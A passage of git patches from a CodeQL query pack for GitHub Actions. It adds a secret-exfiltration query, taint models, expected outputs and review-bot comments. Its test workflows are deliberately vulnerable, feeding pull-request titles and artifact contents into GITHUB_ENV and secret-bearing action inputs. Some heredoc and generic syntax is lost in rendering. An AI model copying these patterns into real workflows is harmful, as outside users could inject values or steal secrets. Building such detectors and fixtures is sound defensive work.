.github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| 
.github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | +| dorny/paths-filter | * | output.changes | PR changed files | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| jitterbit/get-changed-files | * | output.added | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.all | PR changed files | manual | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | +| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | +| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | +| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | +| tj-actions/changed-files | * | 
output.added_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | +| trilom/file-changes-action | * | output.files | PR changed files | manual | +| trilom/file-changes-action | * | output.files_added | PR changed files | manual | +| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | +| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | +| tzkhan/pr-update-action | * | output.headMatch | | manual | +| xt0rted/slash-command-action | 
* | output.command-arguments | | manual | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| 
coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | 
output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +calls +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $(> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV echo "EOF" >> 
$GITHUB_ENV - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" - ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" - ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "$TITLE" >> "${GITHUB_ENV}" echo "EOF" >> "${GITHUB_ENV}" - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" echo EOF } >> "$GITHUB_ENV" + - run: | + cat <<-"EOF" >> "$GITHUB_ENV" + echo "$TITLE" + EOF diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 32379a7264f7..31a550e37565 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -5,6 +5,8 @@ edges | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | 
@@ -18,5 +20,9 @@ nodes | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 77db4c10344d..527808d10b04 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -5,6 +5,8 @@ edges | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | 
@@ -18,6 +20,10 @@ nodes | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | 
@@ -27,3 +33,5 @@ subpaths | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | | .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:31:9:37:6 | Run Step | Run Step | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:37:9:45:6 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index bf515674d903..c9f814139a00 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,7 +2,8 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | 
@@ -74,6 +75,7 @@ nodes | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | semmle.label | Run Step: pr | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 6ba7a1c714ae..35b27172db67 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -2,7 +2,8 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | 
@@ -74,6 +75,7 @@ nodes | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | semmle.label | Run Step: pr | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | From e45010ec5bdcbff5f5136b85cb75ae1a7d1e8e0d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:07:54 +0200 Subject: [PATCH 172/707] Add Secret exfiltration query --- .../security/SecretExfiltrationQuery.qll | 22 ++++++++ ...rSource_sonarcloud-github-action.model.yml | 7 +++ ql/src/Security/CWE-200/SecretExfiltration.ql | 22 ++++++++ .../CWE-200/.github/workflows/test1.yml | 50 +++++++++++++++++++ .../CWE-200/SecretExfiltration.expected | 22 ++++++++ .../Security/CWE-200/SecretExfiltration.qlref | 2 + 6 files changed, 125 insertions(+) create mode 100644 ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll create mode 100644 ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml create mode 100644 ql/src/Security/CWE-200/SecretExfiltration.ql create mode 100644 ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected create mode 100644 ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref 
diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll
new file mode 100644
index 000000000000..1886af435cfb
--- /dev/null
+++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll
@@ -0,0 +1,22 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+private import codeql.actions.security.ArtifactPoisoningQuery
+import codeql.actions.DataFlow
+
+private class SecretExfiltrationSink extends DataFlow::Node {
+ SecretExfiltrationSink() { externallyDefinedSink(this, "secret-exfiltration") }
+}
+
+/**
+ * A taint-tracking configuration for untrusted data that reaches a sink where it may lead to secret exfiltration
+ */
+private module SecretExfiltrationConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof SecretExfiltrationSink }
+}
+
+/** Tracks flow of unsafe user input that is used in a context where it may lead to a secret exfiltration. */
+module SecretExfiltrationFlow = TaintTracking::Global;
diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
new file mode 100644
index 000000000000..0220f0d54d84
--- /dev/null
+++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"]
+
diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/ql/src/Security/CWE-200/SecretExfiltration.ql
new file mode 100644
index 000000000000..a6d1c18b733a
--- /dev/null
+++ b/ql/src/Security/CWE-200/SecretExfiltration.ql
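Review bot: `private import codeql.actions.security.ArtifactPoisoningQuery` in SecretExfiltrationQuery.qll is referenced by nothing in the file — the sink comes from `externallyDefinedSink` and the configuration only uses `RemoteFlowSource` and `SecretExfiltrationSink` — so it should be removed unless it is kept for a side effect, in which case a one-line comment should say so. `SecretExfiltrationSink` has no QLDoc while the module and the flow alias do; `/** A sink registered under the `secret-exfiltration` kind in the extensible sink models. */` would keep the file consistent. The final `TaintTracking::Global;` appears to have lost its type argument in this rendering and presumably reads `TaintTracking::Global<SecretExfiltrationConfig>` in the actual source.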
@@ -0,0 +1,22 @@
+/**
+ * @name Secret exfiltration
+ * @description Secrets may be exfiltrated by an attacker who can control the data sent to an external service.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9.0
+ * @precision high
+ * @id actions/secret-exfiltration
+ * @tags actions
+ * security
+ * external/cwe/cwe-200
+ */
+
+import actions
+import codeql.actions.security.SecretExfiltrationQuery
+import SecretExfiltrationFlow::PathGraph
+
+from SecretExfiltrationFlow::PathNode source, SecretExfiltrationFlow::PathNode sink
+where SecretExfiltrationFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
new file mode 100644
index 000000000000..21e7aac47686
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
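Review bot: The alert message in the `select` clause has a doubled word, `"... which may be be leaked to an attacker-controlled resource."`; it should be `"Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource."`, and the three `#select` rows in SecretExfiltration.expected that repeat the typo will need regenerating afterwards. The `@description` could also name what the query actually flags, e.g. `Untrusted data reaches an input of an action that sends it, together with the step's secrets, to an external service.`, since "control the data sent" alone does not tell a reader why a secret is at risk.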
@@ -0,0 +1,50 @@ +name: Sonar Code Coverage Upload +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + sonar: + name: Sonar + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected new file mode 100644 index 000000000000..3fbc081a0f42 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected 
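Review bot: The fixture does not say which path the new query is expected to find, so the three expected alerts are hard to relate to the YAML without opening the model file. A leading comment such as `# Test: values unpacked from a workflow_run artifact are echoed into GITHUB_ENV and then reach the args input of sonarcloud-github-action, which is modelled as a secret-exfiltration sink` would document the source (the github-script download step), the env propagation in the "set env vars" step and the sink in one place. The `if: env.SONAR_HEAD != 'develop'` condition also plays no role in the expected output, so a note that it is incidental would stop a reader from assuming the query reasons about it.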
@@ -0,0 +1,22 @@ +edges +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | +| .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:34:9:39:6 | Run Step | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | +nodes +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | semmle.label | Job: sonar [SONAR_BASE] | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | semmle.label | Job: sonar [SONAR_HEAD] | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | semmle.label | Job: sonar [SONAR_PR_NUM] | +| .github/workflows/test1.yml:12:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | semmle.label | env.SONAR_BASE | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | semmle.label | env.SONAR_HEAD | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | semmle.label | env.SONAR_PR_NUM | +subpaths +#select +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. 
